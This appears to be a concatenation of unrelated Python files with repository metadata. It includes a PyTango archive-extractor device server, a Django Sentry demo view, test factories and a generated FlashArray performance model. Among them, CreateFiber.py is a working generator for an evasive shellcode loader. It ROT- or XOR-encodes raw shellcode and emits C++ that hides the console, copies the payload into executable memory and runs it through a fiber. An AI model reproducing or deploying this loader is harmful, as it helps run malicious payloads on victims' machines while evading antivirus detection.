print(time.ctime()+'In read_dyn_attr(%s): %s[%d]:%s...%s'
%(aname,type(lv[0]),len(lv),lv[0],lv[-1]))
else: print '\tno values'
attr.set_value(lv[-1])
else:
if atformat == PyTango.SpectrumAttr:
if attype == PyTango.DevString:
values = [(fn.time2str(d[0]),str(d[1])) for d in data]
else:
values = [(d[0],conv(d[1])) for d in data]
else:
if attype is PyTango.DevString:
values = [[fn.time2str(d[0])]+map(str,d[1]) for d in data]
else:
values = [[d[0]]+map(conv,d[1]) for d in data]
if values:
print time.ctime()+'In read_dyn_attr(%s): %s[%d]:%s...%s'%(aname,type(values[0]),len(values),values[0],values[-1])
else:
print '\tno values'
attr.set_value(values,len(values))
print '\treturned %d values'%len(values)
except Exception as e:
traceback.print_exc()
raise e
def is_dyn_attr_allowed(self,attr,req_type=None):
return True #self.IsDataReady(attr.name)
def reader_hook(self,attribute,values):
"""This method will be executed by the ReaderProcess to process the queried data."""
try:
print('>'*80)
print(time.ctime()+' In reader_hook(%s,[%d])'
%(attribute,len(values)))
self.counter-=1
print(self.counter)
MAXDIM = 1024*1024*1024
#First create the attributes
epoch,data,aname = [],[],attribute.replace('/','__')
values = decimate_values(values)
[(epoch.append(v[0]),data.append(v[1])) for v in values]
writable = PyTango.AttrWriteType.READ
#Adding time attribute
m,atformat,dims = None,PyTango.SpectrumAttr,[MAXDIM]
for d in data:
if d is not None:
if fn.isSequence(d):
atformat,dims = PyTango.ImageAttr,[MAXDIM,MAXDIM]
m = d[0]
else:
m = d
break
attype = PyTango.DevDouble if (fn.isNumber(m) or fn.isBool(m)) else PyTango.DevString
self.add_attribute(
PyTango.ImageAttr(aname,attype,writable,MAXDIM,MAXDIM),
self.read_dyn_attr,None,self.is_dyn_attr_allowed)
self.add_attribute(
PyTango.SpectrumAttr(aname+'_t',PyTango.DevDouble, writable,MAXDIM),
self.read_dyn_attr,None,self.is_dyn_attr_allowed)
self.add_attribute(
PyTango.SpectrumAttr(aname+'_d',PyTango.DevString, writable,MAXDIM),
self.read_dyn_attr,None,self.is_dyn_attr_allowed)
#ARRAY
self.add_attribute(atformat(aname+'_r',attype, writable,*dims),
self.read_dyn_attr,None,self.is_dyn_attr_allowed)
#LAST VALUE
self.add_attribute(PyTango.Attr(aname+'_l',attype,PyTango.AttrWriteType.READ),
self.read_dyn_attr,None,self.is_dyn_attr_allowed)
#LAST DATE
self.add_attribute(
PyTango.Attr(aname+'_ld',PyTango.DevString,PyTango.AttrWriteType.READ),
self.read_dyn_attr,None,self.is_dyn_attr_allowed)
#Then add the data to Cache values, so IsDataReady will return True
t = fn.now()
self.RemoveCachedAttribute(attribute)
self.AttrData[attribute] = (t,atformat,attype,values)
print('Done: %s,%s,%s,%s,%d'%(attribute,t,atformat,attype,len(values)))
except:
print(traceback.format_exc())
#------------------------------------------------------------------
# Device constructor
#------------------------------------------------------------------
def __init__(self,cl, name):
PyTango.Device_4Impl.__init__(self,cl,name)
self.AttrData,self.reader = fandango.CaselessDict(),None #Created here to be init() proof
PyExtractor.init_device(self)
#------------------------------------------------------------------
# Device destructor
#------------------------------------------------------------------
def delete_device(self):
print time.ctime()+"[Device delete_device method] for device",self.get_name()
self.reader.stop()
#del self.reader
print 'Waiting 10 seconds'
time.sleep(10.)
print 'Finished'
#------------------------------------------------------------------
# Device initialization
#------------------------------------------------------------------
def init_device(self):
print time.ctime()+"In ", self.get_name(), "::init_device()"
self.counter = 0
self.set_state(PyTango.DevState.ON)
self.get_device_properties(self.get_device_class())
if not self.reader:
self.reader = PyTangoArchiving.reader.ReaderProcess(self.DbSchema)
if self.AttrData: self.RemoveCachedAttributes()
#------------------------------------------------------------------
# Always excuted hook method
#------------------------------------------------------------------
def always_executed_hook(self):
msg = 'Attributes in cache:\n'
for k,v in self.AttrData.items():
msg+='\t%s: %s\n'%(k,fn.time2str(v[0]))
print(time.ctime()+"In "+ self.get_name()+ "::always_executed_hook()"+'\n'+msg)
status = 'The device is in %s state\n\n'%self.get_state()
status += msg
self.set_status(status)
self.GetCurrentQueries()
#==================================================================
#
# PyExtractor read/write attribute methods
#
#==================================================================
#------------------------------------------------------------------
# Read Attribute Hardware
#------------------------------------------------------------------
def read_attr_hardware(self,data):
#print time.ctime()+"In ", self.get_name(), "::read_attr_hardware()"
pass
#==================================================================
#
# PyExtractor command methods
#
#==================================================================
@Cached(depth=30,expire=15.)
def GetAttDataBetweenDates(self, argin):
"""
Arguments to be AttrName, StartDate, StopDate, Synchronous
If Synchronous is missing or False, data is buffered into attributes, which names are returned
If True or Yes, all the data is returned when ready
Data returned will be (rows,[t0,v0,t1,v1,t2,v2,...])
"""
print time.ctime()+"In ", self.get_name(), "::GetAttDataBetweenDates(%s)"%argin
# Add your own code here
size = 0
aname = argin[0]
tag = self.attr2tag(aname)
dates = self.dates2times(argin[1:3])
RW = False
synch = fn.searchCl('yes|true',str(argin[3:4]))
attrs = [tag,tag+'_r',tag+'_w',tag+'_t'] if RW else [tag,tag+'_r',tag+'_w',tag+'_t']
self.reader.get_attribute_values(aname,
(lambda v: self.reader_hook(aname,v)),dates[0],dates[1],
decimate=True, cache=self.UseApiCache)
self.counter+=1
print(self.counter)
argout = [fn.shape(attrs),[a for a in attrs]]
if not synch:
print '\t%s'%argout
return argout
else:
while not self.IsDataReady(aname):
fandango.wait(0.1)
data = self.AttrData[aname][-1]
for t,v in data:
argout.append(t)
argout.extend(fn.toSequence(v))
return [fn.shape(data),argout]
def GetCachedAttribute(self,argin):
n,a = self.get_name(),self.attr2tag(argin)
return [n+'/'+a+s for s in ('','_r','_t')]
def RemoveCachedAttribute(self, argin):
print time.ctime()+"In ", self.get_name(), "::RemoveCachedAttribute(%s)"%argin
# Add your own code here
argin = self.tag2attr(argin)
if argin in self.AttrData:
data = self.AttrData.pop(argin)
del data
else:
print('\tAttribute %s not in AttrData!!!!'%argin)
if False:
#All this part disabled as it doesn't work well in PyTango 7.2.2
try:
attrlist = self.get_device_attr().get_attribute_list()
attrlist = [a.get_name().lower() for a in attrlist]
print 'Attributelist: %s'%[str(a) for a in attrlist]
except:
print traceback.format_exc()
aname = argin.replace('/','__').lower()
for s in ('','_r','_t',''):#,'_w'):
try:
if aname in attrlist:
self.remove_attribute(aname+s)
else:
print('%s attribute does not exist!'%aname)
except Exception,e:
print('\tremove_attribute(%s): %s'%(aname+s,e))
return
def RemoveCachedAttributes(self):
print "In ", self.get_name(), "::RemoveCachedAttributes()"
# Add your own code here
remove = [a for a,v in self.AttrData.items() if v[0]<fn.now()-self.ExpireTime]
for a in self.AttrData.keys()[:]:
self.RemoveCachedAttribute(a)
def IsArchived(self, argin):
print "In ", self.get_name(), "::IsArchived()"
# Add your own code here
return self.reader.is_attribute_archived(argin)
def IsDataReady(self, argin):
print "In ", self.get_name(), "::IsDataReady(%s)"%argin
# Add your own code here
aname = self.tag2attr(argin)
argout = aname in self.AttrData
print '\tIsDataReady(%s == %s): %s'%(argin,aname,argout)
return argout
def GetCurrentArchivedAtt(self):
print "In ", self.get_name(), "::GetCurrentArchivedAtt()"
# Add your own code here
return self.reader.get_attributes(active=True)
@Cached(depth=30,expire=10.)
def GetCurrentQueries(self):
print("In "+self.get_name()+"::GetCurrentQueries()")
#self.get_device_properties()
#if not self.is_command_polled('state'):
#self.poll_command('state',3000)
try:
pending = []
for s in self.PeriodicQueries:
s = s.split(',')
a,t = s[0],max((float(s[-1]),self.ExpireTime))
if a not in self.AttrData or self.AttrData[a][0]<(fn.now()-t):
if a in self.AttrData:
print('%s data is %s seconds old'%(a,fn.now()-self.AttrData[a][0]))
pending.append(s[:3])
if pending:
self.set_state(PyTango.DevState.RUNNING)
print('Executing %d scheduled queries:\n%s'%(len(pending),'\n'.join(map(str,pending))))
for p in pending:
self.GetAttDataBetweenDates(p)
else:
self.set_state(PyTango.DevState.ON)
except:
self.set_state(PyTango.DevState.FAULT)
self.set_status(traceback.format_exc())
print(self.get_status())
return self.PeriodicQueries
def AddPeriodicQuery(self,argin):
attribute = argin[0]
start = argin[1]
stop = argin[2] if len(argin)==4 else '-1'
period = argin[3]
self.get_device_properties()
queries = dict(p.split(',',1) for p in self.PeriodicQueries)
queries[attribute]='%s,%s,%s,%s'%(attribute,start,stop,period)
fandango.tango.put_device_property(self.get_name(),'PeriodicQueries',sorted(queries.values()))
self.get_device_properties()
return self.get_name()+'/'+self.attr2tag(attribute)
#==================================================================
#
# PyExtractorClass class definition
#
#==================================================================
class PyExtractorClass(PyTango.DeviceClass):
# Class Properties
class_property_list = {
'AliasFile':
[PyTango.DevString,
"",
[] ],
'DbConfig':
[PyTango.DevString,
"",
[] ],
'DbHost':
[PyTango.DevString,
"",
[] ],
}
# Device Properties
device_property_list = {
'DbSchema':
[PyTango.DevString,
"Database to use (hdb/tdb)",
["hdb"] ],
'UseApiCache':
[PyTango.DevBoolean,
"Enable/Disable Reader Cache",
[ True ] ],
'ExpireTime':
[PyTango.DevLong,
"Seconds to cache each request",
[ 180 ] ],
'PeriodicQueries':
[PyTango.DevVarStringArray,
"Queries to be executed periodically: Attr,Start,Stop,Period(s)",
[ ] ],
}
# Command definitions
cmd_list = {
'GetAttDataBetweenDates':
[[PyTango.DevVarStringArray, ""],
[PyTango.DevVarLongStringArray, ""]],
'GetCachedAttribute':
[[PyTango.DevString, ""],
[PyTango.DevVarStringArray, ""]],
'RemoveCachedAttribute':
[[PyTango.DevString, ""],
[PyTango.DevVoid, ""]],
'RemoveCachedAttributes':
[[PyTango.DevVoid, ""],
[PyTango.DevVoid, ""]],
'IsArchived':
[[PyTango.DevString, ""],
[PyTango.DevBoolean, ""]],
'IsDataReady':
[[PyTango.DevString, "Requested attribute"],
[PyTango.DevBoolean, ""]],
'GetCurrentArchivedAtt':
[[PyTango.DevVoid, ""],
[PyTango.DevVarStringArray, ""]],
'GetCurrentQueries':
[[PyTango.DevVoid, ""],
[PyTango.DevVarStringArray, ""],
{
'Polling period': "15000",
} ],
'AddPeriodicQuery':
[[PyTango.DevVarStringArray, ""],
[PyTango.DevString, ""]],
}
# Attribute definitions
attr_list = {
}
#------------------------------------------------------------------
# PyExtractorClass Constructor
#------------------------------------------------------------------
def __init__(self, name):
PyTango.DeviceClass.__init__(self, name)
self.set_type(name);
print "In PyExtractorClass constructor"
#==================================================================
#
# PyExtractor class main method
#
#==================================================================
if __name__ == '__main__':
try:
py = PyTango.Util(sys.argv)
py.add_TgClass(PyExtractorClass,PyExtractor,'PyExtractor')
U = PyTango.Util.instance()
U.server_init()
U.server_run()
except PyTango.DevFailed,e:
print '-------> Received a DevFailed exception:',e
except Exception,e:
print '-------> An unforeseen exception occured....',e
| 37.457539 | 141 | 0.493222 |
4003ec8c48661a32fac34b3ba2bb854d8f83ded8 | 166 | py | Python | sentry-handle-exceptions-django-projects/step2/djsentry/errors/views.py | fullstackpython/blog-code-examples | a6afcb874e88086686071aa1b2a47548aed5a2b0 | [
"MIT"
] | 65 | 2017-06-13T01:02:17.000Z | 2022-01-10T09:58:29.000Z | sentry-handle-exceptions-django-projects/step2/djsentry/errors/views.py | fullstackpython/blog-code-examples | a6afcb874e88086686071aa1b2a47548aed5a2b0 | [
"MIT"
] | 1 | 2020-06-05T18:07:42.000Z | 2020-06-05T18:07:42.000Z | sentry-handle-exceptions-django-projects/step2/djsentry/errors/views.py | fullstackpython/blog-code-examples | a6afcb874e88086686071aa1b2a47548aed5a2b0 | [
"MIT"
] | 50 | 2017-07-01T02:10:19.000Z | 2022-03-24T17:23:58.000Z | # djsentry/errors/views.py
from django.shortcuts import render
def errors_index(request):
division_by_zero = 1 / 0
return render(request, 'index.html', {})
| 20.75 | 44 | 0.722892 |
4cf4e85665ff423c4d1f484a17e4444a99b2ad7d | 599 | py | Python | tests/factories.py | oriolpiera/anem-per-feina | 006d2f105596d17afd1d121cccabe97ce6ff3b55 | [
"MIT"
] | null | null | null | tests/factories.py | oriolpiera/anem-per-feina | 006d2f105596d17afd1d121cccabe97ce6ff3b55 | [
"MIT"
] | null | null | null | tests/factories.py | oriolpiera/anem-per-feina | 006d2f105596d17afd1d121cccabe97ce6ff3b55 | [
"MIT"
] | null | null | null | import factory
from jobsapp.models import User, Job
# List of factories
class UserFactory(factory.django.DjangoModelFactory):
class Meta:
model = User
django_get_or_create = ('first_name', 'last_name')
first_name = 'John'
last_name = 'Doe'
class JobFactory(factory.django.DjangoModelFactory):
class Meta:
model = Job
django_get_or_create = ('type')
user = factory.SubFactory('jobsapp.tests.UserFactory')
title = factory.Sequence(lambda n: 'Title %d' % n)
description = factory.Sequence(lambda n: 'Description %d' % n)
type = '1'
| 24.958333 | 66 | 0.674457 |
d16a14b78267943236614a842c40de93ddaef236 | 3,502 | py | Python | module/memory/CreateFiber.py | zhzyker/FourEye | 55c9a5b45f69dab736821a4c696ce4398605303c | [
"Apache-2.0"
] | 1 | 2021-09-14T09:39:56.000Z | 2021-09-14T09:39:56.000Z | module/memory/CreateFiber.py | zhzyker/FourEye | 55c9a5b45f69dab736821a4c696ce4398605303c | [
"Apache-2.0"
] | null | null | null | module/memory/CreateFiber.py | zhzyker/FourEye | 55c9a5b45f69dab736821a4c696ce4398605303c | [
"Apache-2.0"
] | 1 | 2021-08-31T13:48:37.000Z | 2021-08-31T13:48:37.000Z | #!/usr/bin/python
import sys
import os
from termcolor import colored
def rot_compailed(shellcode_size, shellcode):
load = '''
#include <windows.h>
int main()
{
FreeConsole();
PVOID mainFiber = ConvertThreadToFiber(NULL);
unsigned char shellcode[] ;
for (int i = 0; i < sizeof shellcode; i++)
{
shellcode[i] = shellcode[i] - 13;
}
PVOID shellcodeLocation = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(shellcodeLocation, shellcode, sizeof shellcode);
PVOID shellcodeFiber = CreateFiber(NULL, (LPFIBER_START_ROUTINE)shellcodeLocation, NULL);
SwitchToFiber(shellcodeFiber);
return 0;
}
'''
loads = load.replace('shellcode[]', shellcode, 1)
with open('/root/shellcode.cpp', 'w+') as f:
f.write(loads)
def xor_compailed(shellcode_size, shellcode):
load = '''
#include <windows.h>
int main()
{
FreeConsole();
PVOID mainFiber = ConvertThreadToFiber(NULL);
unsigned char shellcode[] ;
for (int i = 0; i < sizeof shellcode; i++)
{
shellcode[i] = shellcode[i] ^ 0x11 ^ 0x55;
}
PVOID shellcodeLocation = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(shellcodeLocation, shellcode, sizeof shellcode);
PVOID shellcodeFiber = CreateFiber(NULL, (LPFIBER_START_ROUTINE)shellcodeLocation, NULL);
SwitchToFiber(shellcodeFiber);
return 0;
}
'''
loads = load.replace('shellcode[]', shellcode, 1)
with open('/root/shellcode.cpp', 'w+') as f:
f.write(loads)
def Fiber_rot_13():
shellcode_add = input("\033[4mPlease input Shellcode:\033[0m" + colored(" >>", "green"))
shellcode = ''
shellcode_size = 0
try:
with open(shellcode_add, 'rb') as f:
while True:
code = f.read(1)
if not code:
break
base10 = ord(code) + 0x0D
code_hex = hex(base10)
code_hex = code_hex.replace('0x', '')
if (len(code_hex) == 1):
code_hex = '0' + code_hex
shellcode += r'\x' + code_hex
shellcode_size += 1
f.close()
except Exception as e:
sys.stderr.writelines(str(e))
shellcodes = "shellcode[] = \"" + shellcode + "\""
rot_compailed(shellcode_size, shellcodes)
def Fiber_xor_13():
shellcode_add = input("\033[4mPlease input Shellcode:\033[0m" + colored(" >>", "green"))
shellcode = ''
new_shellcode = ''
shellcode_size = 0
try:
with open(shellcode_add, 'rb') as f:
while True:
code = f.read(1)
if not code:
break
base10 = ord(code) ^ 0x55 ^ 0x11
code_hex = hex(base10)
code_hex = code_hex.replace('0x', '')
if (len(code_hex) == 1):
code_hex = '0' + code_hex
shellcode += r'\x' + code_hex
shellcode_size += 1
f.close()
except Exception as e:
sys.stderr.writelines(str(e))
shellcodes = "shellcode[] = \"" + shellcode + "\""
xor_compailed(shellcode_size, shellcodes) | 28.241935 | 104 | 0.531696 |
9b8e35f838902bc89cdb4b5edab89784478335dc | 20,725 | py | Python | pypureclient/flasharray/FA_2_7/models/host_group_performance_by_array.py | Flav-STOR-WL/py-pure-client | 03b889c997d90380ac5d6380ca5d5432792d3e89 | [
"BSD-2-Clause"
] | 14 | 2018-12-07T18:30:27.000Z | 2022-02-22T09:12:33.000Z | pypureclient/flasharray/FA_2_7/models/host_group_performance_by_array.py | Flav-STOR-WL/py-pure-client | 03b889c997d90380ac5d6380ca5d5432792d3e89 | [
"BSD-2-Clause"
] | 28 | 2019-09-17T21:03:52.000Z | 2022-03-29T22:07:35.000Z | pypureclient/flasharray/FA_2_7/models/host_group_performance_by_array.py | Flav-STOR-WL/py-pure-client | 03b889c997d90380ac5d6380ca5d5432792d3e89 | [
"BSD-2-Clause"
] | 15 | 2020-06-11T15:50:08.000Z | 2022-03-21T09:27:25.000Z | # coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.7
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_7 import models
class HostGroupPerformanceByArray(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'bytes_per_mirrored_write': 'int',
'bytes_per_op': 'int',
'bytes_per_read': 'int',
'bytes_per_write': 'int',
'mirrored_write_bytes_per_sec': 'int',
'mirrored_writes_per_sec': 'int',
'qos_rate_limit_usec_per_mirrored_write_op': 'int',
'qos_rate_limit_usec_per_read_op': 'int',
'qos_rate_limit_usec_per_write_op': 'int',
'queue_usec_per_mirrored_write_op': 'int',
'queue_usec_per_read_op': 'int',
'queue_usec_per_write_op': 'int',
'read_bytes_per_sec': 'int',
'reads_per_sec': 'int',
'san_usec_per_mirrored_write_op': 'int',
'san_usec_per_read_op': 'int',
'san_usec_per_write_op': 'int',
'service_usec_per_mirrored_write_op': 'int',
'service_usec_per_read_op': 'int',
'service_usec_per_write_op': 'int',
'time': 'int',
'usec_per_mirrored_write_op': 'int',
'usec_per_read_op': 'int',
'usec_per_write_op': 'int',
'write_bytes_per_sec': 'int',
'writes_per_sec': 'int',
'service_usec_per_read_op_cache_reduction': 'float',
'id': 'str',
'name': 'str',
'array': 'Resource'
}
attribute_map = {
'bytes_per_mirrored_write': 'bytes_per_mirrored_write',
'bytes_per_op': 'bytes_per_op',
'bytes_per_read': 'bytes_per_read',
'bytes_per_write': 'bytes_per_write',
'mirrored_write_bytes_per_sec': 'mirrored_write_bytes_per_sec',
'mirrored_writes_per_sec': 'mirrored_writes_per_sec',
'qos_rate_limit_usec_per_mirrored_write_op': 'qos_rate_limit_usec_per_mirrored_write_op',
'qos_rate_limit_usec_per_read_op': 'qos_rate_limit_usec_per_read_op',
'qos_rate_limit_usec_per_write_op': 'qos_rate_limit_usec_per_write_op',
'queue_usec_per_mirrored_write_op': 'queue_usec_per_mirrored_write_op',
'queue_usec_per_read_op': 'queue_usec_per_read_op',
'queue_usec_per_write_op': 'queue_usec_per_write_op',
'read_bytes_per_sec': 'read_bytes_per_sec',
'reads_per_sec': 'reads_per_sec',
'san_usec_per_mirrored_write_op': 'san_usec_per_mirrored_write_op',
'san_usec_per_read_op': 'san_usec_per_read_op',
'san_usec_per_write_op': 'san_usec_per_write_op',
'service_usec_per_mirrored_write_op': 'service_usec_per_mirrored_write_op',
'service_usec_per_read_op': 'service_usec_per_read_op',
'service_usec_per_write_op': 'service_usec_per_write_op',
'time': 'time',
'usec_per_mirrored_write_op': 'usec_per_mirrored_write_op',
'usec_per_read_op': 'usec_per_read_op',
'usec_per_write_op': 'usec_per_write_op',
'write_bytes_per_sec': 'write_bytes_per_sec',
'writes_per_sec': 'writes_per_sec',
'service_usec_per_read_op_cache_reduction': 'service_usec_per_read_op_cache_reduction',
'id': 'id',
'name': 'name',
'array': 'array'
}
required_args = {
}
def __init__(
self,
bytes_per_mirrored_write=None, # type: int
bytes_per_op=None, # type: int
bytes_per_read=None, # type: int
bytes_per_write=None, # type: int
mirrored_write_bytes_per_sec=None, # type: int
mirrored_writes_per_sec=None, # type: int
qos_rate_limit_usec_per_mirrored_write_op=None, # type: int
qos_rate_limit_usec_per_read_op=None, # type: int
qos_rate_limit_usec_per_write_op=None, # type: int
queue_usec_per_mirrored_write_op=None, # type: int
queue_usec_per_read_op=None, # type: int
queue_usec_per_write_op=None, # type: int
read_bytes_per_sec=None, # type: int
reads_per_sec=None, # type: int
san_usec_per_mirrored_write_op=None, # type: int
san_usec_per_read_op=None, # type: int
san_usec_per_write_op=None, # type: int
service_usec_per_mirrored_write_op=None, # type: int
service_usec_per_read_op=None, # type: int
service_usec_per_write_op=None, # type: int
time=None, # type: int
usec_per_mirrored_write_op=None, # type: int
usec_per_read_op=None, # type: int
usec_per_write_op=None, # type: int
write_bytes_per_sec=None, # type: int
writes_per_sec=None, # type: int
service_usec_per_read_op_cache_reduction=None, # type: float
id=None, # type: str
name=None, # type: str
array=None, # type: models.Resource
):
"""
Keyword args:
bytes_per_mirrored_write (int): The average I/O size per mirrored write. Measured in bytes.
bytes_per_op (int): The average I/O size for both read and write (all) operations.
bytes_per_read (int): The average I/O size per read. Measured in bytes.
bytes_per_write (int): The average I/O size per write. Measured in bytes.
mirrored_write_bytes_per_sec (int): The number of mirrored bytes written per second.
mirrored_writes_per_sec (int): The number of mirrored writes per second.
qos_rate_limit_usec_per_mirrored_write_op (int): The average time it takes the array to process a mirrored I/O write request. Measured in microseconds.
qos_rate_limit_usec_per_read_op (int): The average time spent waiting due to QoS rate limiting for a read request. Measured in microseconds.
qos_rate_limit_usec_per_write_op (int): The average time that a write I/O request spends waiting as a result of the volume reaching its QoS bandwidth limit. Measured in microseconds.
queue_usec_per_mirrored_write_op (int): The average time that a mirrored write I/O request spends in the array waiting to be served. Measured in microseconds.
queue_usec_per_read_op (int): The average time that a read I/O request spends in the array waiting to be served. Measured in microseconds.
queue_usec_per_write_op (int): The average time that a write I/O request spends in the array waiting to be served. Measured in microseconds.
read_bytes_per_sec (int): The number of bytes read per second.
reads_per_sec (int): The number of read requests processed per second.
san_usec_per_mirrored_write_op (int): The average time required to transfer data from the initiator to the array for a mirrored write request. Measured in microseconds.
san_usec_per_read_op (int): The average time required to transfer data from the array to the initiator for a read request. Measured in microseconds.
san_usec_per_write_op (int): The average time required to transfer data from the initiator to the array for a write request. Measured in microseconds.
service_usec_per_mirrored_write_op (int): The average time required for the array to service a mirrored write request. Measured in microseconds.
service_usec_per_read_op (int): The average time required for the array to service a read request. Measured in microseconds.
service_usec_per_write_op (int): The average time required for the array to service a write request. Measured in microseconds.
time (int): The time when the sample performance data was taken. Measured in milliseconds since the UNIX epoch.
usec_per_mirrored_write_op (int): The average time it takes the array to process a mirrored I/O write request. Measured in microseconds. The average time does not include SAN time, queue time, or QoS rate limit time.
usec_per_read_op (int): The average time it takes the array to process an I/O read request. Measured in microseconds. The average time does not include SAN time, queue time, or QoS rate limit time.
usec_per_write_op (int): The average time it takes the array to process an I/O write request. Measured in microseconds. The average time does not include SAN time, queue time, or QoS rate limit time.
write_bytes_per_sec (int): The number of bytes written per second.
writes_per_sec (int): The number of write requests processed per second.
service_usec_per_read_op_cache_reduction (float): The percentage reduction in `service_usec_per_read_op` due to data cache hits. For example, a value of 0.25 indicates that the value of `service_usec_per_read_op` is 25% lower than it would have been without any data cache hits.
id (str): A globally unique, system-generated ID. The ID cannot be modified and cannot refer to another resource.
name (str): A user-specified name. The name must be locally unique and can be changed.
array (Resource): The array on which the performance metrics were recorded.
"""
if bytes_per_mirrored_write is not None:
self.bytes_per_mirrored_write = bytes_per_mirrored_write
if bytes_per_op is not None:
self.bytes_per_op = bytes_per_op
if bytes_per_read is not None:
self.bytes_per_read = bytes_per_read
if bytes_per_write is not None:
self.bytes_per_write = bytes_per_write
if mirrored_write_bytes_per_sec is not None:
self.mirrored_write_bytes_per_sec = mirrored_write_bytes_per_sec
if mirrored_writes_per_sec is not None:
self.mirrored_writes_per_sec = mirrored_writes_per_sec
if qos_rate_limit_usec_per_mirrored_write_op is not None:
self.qos_rate_limit_usec_per_mirrored_write_op = qos_rate_limit_usec_per_mirrored_write_op
if qos_rate_limit_usec_per_read_op is not None:
self.qos_rate_limit_usec_per_read_op = qos_rate_limit_usec_per_read_op
if qos_rate_limit_usec_per_write_op is not None:
self.qos_rate_limit_usec_per_write_op = qos_rate_limit_usec_per_write_op
if queue_usec_per_mirrored_write_op is not None:
self.queue_usec_per_mirrored_write_op = queue_usec_per_mirrored_write_op
if queue_usec_per_read_op is not None:
self.queue_usec_per_read_op = queue_usec_per_read_op
if queue_usec_per_write_op is not None:
self.queue_usec_per_write_op = queue_usec_per_write_op
if read_bytes_per_sec is not None:
self.read_bytes_per_sec = read_bytes_per_sec
if reads_per_sec is not None:
self.reads_per_sec = reads_per_sec
if san_usec_per_mirrored_write_op is not None:
self.san_usec_per_mirrored_write_op = san_usec_per_mirrored_write_op
if san_usec_per_read_op is not None:
self.san_usec_per_read_op = san_usec_per_read_op
if san_usec_per_write_op is not None:
self.san_usec_per_write_op = san_usec_per_write_op
if service_usec_per_mirrored_write_op is not None:
self.service_usec_per_mirrored_write_op = service_usec_per_mirrored_write_op
if service_usec_per_read_op is not None:
self.service_usec_per_read_op = service_usec_per_read_op
if service_usec_per_write_op is not None:
self.service_usec_per_write_op = service_usec_per_write_op
if time is not None:
self.time = time
if usec_per_mirrored_write_op is not None:
self.usec_per_mirrored_write_op = usec_per_mirrored_write_op
if usec_per_read_op is not None:
self.usec_per_read_op = usec_per_read_op
if usec_per_write_op is not None:
self.usec_per_write_op = usec_per_write_op
if write_bytes_per_sec is not None:
self.write_bytes_per_sec = write_bytes_per_sec
if writes_per_sec is not None:
self.writes_per_sec = writes_per_sec
if service_usec_per_read_op_cache_reduction is not None:
self.service_usec_per_read_op_cache_reduction = service_usec_per_read_op_cache_reduction
if id is not None:
self.id = id
if name is not None:
self.name = name
if array is not None:
self.array = array
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `HostGroupPerformanceByArray`".format(key))
if key == "bytes_per_mirrored_write" and value is not None:
if value < 0:
raise ValueError("Invalid value for `bytes_per_mirrored_write`, must be a value greater than or equal to `0`")
if key == "bytes_per_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `bytes_per_op`, must be a value greater than or equal to `0`")
if key == "bytes_per_read" and value is not None:
if value < 0:
raise ValueError("Invalid value for `bytes_per_read`, must be a value greater than or equal to `0`")
if key == "bytes_per_write" and value is not None:
if value < 0:
raise ValueError("Invalid value for `bytes_per_write`, must be a value greater than or equal to `0`")
if key == "mirrored_write_bytes_per_sec" and value is not None:
if value < 0:
raise ValueError("Invalid value for `mirrored_write_bytes_per_sec`, must be a value greater than or equal to `0`")
if key == "mirrored_writes_per_sec" and value is not None:
if value < 0:
raise ValueError("Invalid value for `mirrored_writes_per_sec`, must be a value greater than or equal to `0`")
if key == "qos_rate_limit_usec_per_mirrored_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `qos_rate_limit_usec_per_mirrored_write_op`, must be a value greater than or equal to `0`")
if key == "qos_rate_limit_usec_per_read_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `qos_rate_limit_usec_per_read_op`, must be a value greater than or equal to `0`")
if key == "qos_rate_limit_usec_per_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `qos_rate_limit_usec_per_write_op`, must be a value greater than or equal to `0`")
if key == "queue_usec_per_mirrored_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `queue_usec_per_mirrored_write_op`, must be a value greater than or equal to `0`")
if key == "queue_usec_per_read_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `queue_usec_per_read_op`, must be a value greater than or equal to `0`")
if key == "queue_usec_per_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `queue_usec_per_write_op`, must be a value greater than or equal to `0`")
if key == "read_bytes_per_sec" and value is not None:
if value < 0:
raise ValueError("Invalid value for `read_bytes_per_sec`, must be a value greater than or equal to `0`")
if key == "reads_per_sec" and value is not None:
if value < 0:
raise ValueError("Invalid value for `reads_per_sec`, must be a value greater than or equal to `0`")
if key == "san_usec_per_mirrored_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `san_usec_per_mirrored_write_op`, must be a value greater than or equal to `0`")
if key == "san_usec_per_read_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `san_usec_per_read_op`, must be a value greater than or equal to `0`")
if key == "san_usec_per_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `san_usec_per_write_op`, must be a value greater than or equal to `0`")
if key == "service_usec_per_mirrored_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `service_usec_per_mirrored_write_op`, must be a value greater than or equal to `0`")
if key == "service_usec_per_read_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `service_usec_per_read_op`, must be a value greater than or equal to `0`")
if key == "service_usec_per_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `service_usec_per_write_op`, must be a value greater than or equal to `0`")
if key == "usec_per_mirrored_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `usec_per_mirrored_write_op`, must be a value greater than or equal to `0`")
if key == "usec_per_read_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `usec_per_read_op`, must be a value greater than or equal to `0`")
if key == "usec_per_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `usec_per_write_op`, must be a value greater than or equal to `0`")
if key == "write_bytes_per_sec" and value is not None:
if value < 0:
